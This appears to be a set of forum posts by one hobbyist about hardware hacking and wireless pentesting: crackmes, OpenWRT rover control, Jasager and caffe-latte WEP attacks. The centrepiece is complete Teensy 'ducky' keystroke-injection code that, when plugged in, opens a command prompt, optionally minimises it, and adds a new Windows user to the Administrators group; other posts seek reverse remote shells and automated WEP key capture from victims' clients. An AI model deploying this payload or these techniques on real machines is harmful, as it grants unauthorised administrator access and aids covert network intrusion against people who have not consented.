dmsmith1991

Try http://www.crackmes.de, people write and submit programs that contain some kind of security system and it is your job to try and crack/bypass it. Most are like registration systems that you find in commercial software, and you need to write a keygen for it etc. It fun and a legal alternative to cracking commercial software :D

So your saying that the bootloader has a seperate set of ID's which aren't replaced when you change the ID's in usb_private.h?

Ok thanks for your suggestions. I was just exploring the windows minimising as it might be useful for some programs if they give suspicious output. I have found that while a command is executing within command prompt, there is an input buffer which allows you to enter commands while this program is executing. This means that I can open command prompt, type all the commands within a few hundred milliseconds and they will all execute one after then other.

If the vendor_id and product_id's are changed, doesn't that mean teensy loader won't detect the teensy when it is plugged in?

Hi Everyone Just wanted to share my first ducky code. It's similar to others that have been posted, but the keypress functions are modular and the ExecuteCommandViaRunWindow function gives you the option to minimise the executed program's window after it has been created. Simply specify 1 for the minimiseWindow argument, and 0 if you are executing something like notepad.exe which you don't want minimised. The current payload creates a new user for windows named "DuckyWasHere" and adds it to the administrator group. Run "net user DuckyWasHere /delete" in command prompt to delete this account. The delay values can probably be reduced; I have been testing on a low-spec desktop. /* Modular ducky code with windows minimising by w02057. Based on code by Irongeek. */ //***pin definitions*** int ledPin = 11; void setup() { pinMode(ledPin, OUTPUT); } void loop() { delay(4000); digitalWrite(ledPin, HIGH); //turn on indicator LED ExecuteCommandViaRunWindow("cmd.exe", 0); //open cmd delay(1000); ExecuteCommand("net user DuckyWasHere quackquack /add"); //type out 1st command ExecuteCommand("net localgroup Administrators DuckyWasHere /add"); //type out 2nd command ExecuteCommand("exit"); //exit cmd digitalWrite(ledPin, LOW); //turn off indicator LED while(1); //halt code } void ExecuteCommand(char *command) { Keyboard.print(command); delay(10); PressAndRelease(KEY_ENTER, 1); delay(100); } void ExecuteCommandViaRunWindow(char *command, int minimiseWindow) { PressAndReleaseWithModifier(MODIFIERKEY_GUI, KEY_R); //open run command window delay(100); //delay to wait for run window to appear //***type command into run window and press enter*** ExecuteCommand(command); //***minimise executed command window if minimiseWindow is set*** if(minimiseWindow == 1) { delay(1000); PressAndReleaseWithModifier(MODIFIERKEY_ALT, KEY_SPACE); PressAndRelease(KEY_DOWN, 3); PressAndRelease(KEY_ENTER, 1); } } void PressAndRelease(int keyCode, int keyCount) { int keyCounter=0; for(keyCounter=0; keyCounter<keyCount; keyCounter++) { Keyboard.set_key1(keyCode); Keyboard.send_now(); delay(10); Keyboard.set_key1(0); Keyboard.send_now(); delay(10); } } void PressAndReleaseWithModifier(int modifierKey, int keyCode) { Keyboard.set_modifier(modifierKey); Keyboard.set_key1(keyCode); Keyboard.send_now(); delay(10); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(10); } I hope this can help people who are struggling to get going on this project. This is my first attempt at writing code for the Teensy, the key functions should be all that is needed for key-based payloads. Based on code by IronGeek Any comments or suggestions would be appreciated. Thanks, David

Agreed, no HID access means that the ducky is dead in the water :D

Hi Guys Recently i've been looking into using a OpenWRT hacked Fon 2.0 beta as the interface between a Rover and PC. My initial ideas were to connect the Fon to an Arduino board via USB, and sending it commands via a USB-to-Serial driver installed on the USB port. Having some kind of TCP Server/AJAX interface to send commands to the Fon, which would then send commands down USB to control the cars motors via the digital outputs on the Arduino. I was also thinking of using the PHP exec() function to send commands to the Arduino, something like this; exec("echo 'Hello Arduino' > /dev/ttyUSB0") Ive done some research, and in terms of the arduino to fon USB-serial connection this seems pretty straight forward, but I cant find anything on configuring the USB port on the fon as a serial port. #####Links##### http://www.windmeadow.com/node/38 http://www.geocities.jp/arduino_diecimila/...ex_en.html#diag http://echodittolabs.org/hacking-la-fonera-2 http://www.arduino.cc/playground/Interfacing/LinuxTTY http://www.jbprojects.net/projects/wifirobot/ ############# Any suggestions or contributions to this to-be-launched project would be greatly appreciated.

Thanks for the info, thats exactly what I wanted :) I guess the next step would be to have It configurable by the Web Interface.

But it this possible with just 1 Fon, rather than having to strap two together?? And also, how would I go about getting a remote Web Interface/Shell for Administration, without having to port-forward a router to accept an incoming connection (ie. Reverse Connection). I guess some coding is involved. And in terms of the Interfaces, I meant master mode not monitor, sorry :) Cheers,

How about making a Jasager backpack for your Cat or Dog. Mad, but wouldnt that be sweet?? The HakCat, lol

Hi All Ive been thinking about getting the Fon to piggy-back on a nearby open wireless network, therefore giving it access to the internet. This would open up a multitude of possibilites such as; >>Connecting back to a PC/Server and giving the pentester remote access for administration, either via an SSH shell or the Web Interface. >>Using this open network to give Jasager connected clients access to the internet. The Fon would be stand-alone, instead of having to have a laptop running DHCP server connected to a cell phone etc, so its ultra-compact. Connected Client >> Jasager >> Open Wireless Network >> Internet >>Connection to an FTP server for logfile and data upload. The Fon could tunnel though SSH and establish a secure connection with a server, so a company's data isn't exposed on pentests etc.. I dont know if the madwifi drivers are capable of having monitor mode interfaces and a managed interface for the open network all at once, but maybe Digininja or someone else can confirm this. Any feedback would be greatly appreciated!!!

Hi Guys How can I change the BT3 boot options, so I dont have to keep typing the config for my laptop every time I boot BT3. Cheers,

Hi Guys Has anyone got any information on getting caffe-latte working on the latest aircrack release. Im confused over the fact that both airbase-ng and aireplay-ng have a caffe-latte mode, but I dont know if they have to be used together etc. Ive tried google, and cant find any good guides/tutorials. Any help is much appreciated :)

Hi Guys I am wondering if it is possible to build a Caffe-Latte module/auto-run script for Jasager, possibly using the new caffe latte attack mode in the latest aircrack-ng release. It could check whether the selected client was trying to connect to a WEP encrypted network, perform the attack, and save the WEP key to a logfile. I guess it must be used in conjunction with a laptop running a share, as the fon wont have sufficient memory to save the replayed packets captured by airodump. I wouldnt know how to go about it myself, but if anyone who would like to give it a go that would be great. All thoughts welcome. PS. Has anyone tried running Aircrack with the jasager madwifi drivers, as packet injection doesnt seem to work for me even when I create a new ath interface with airmon-ng and wifi0.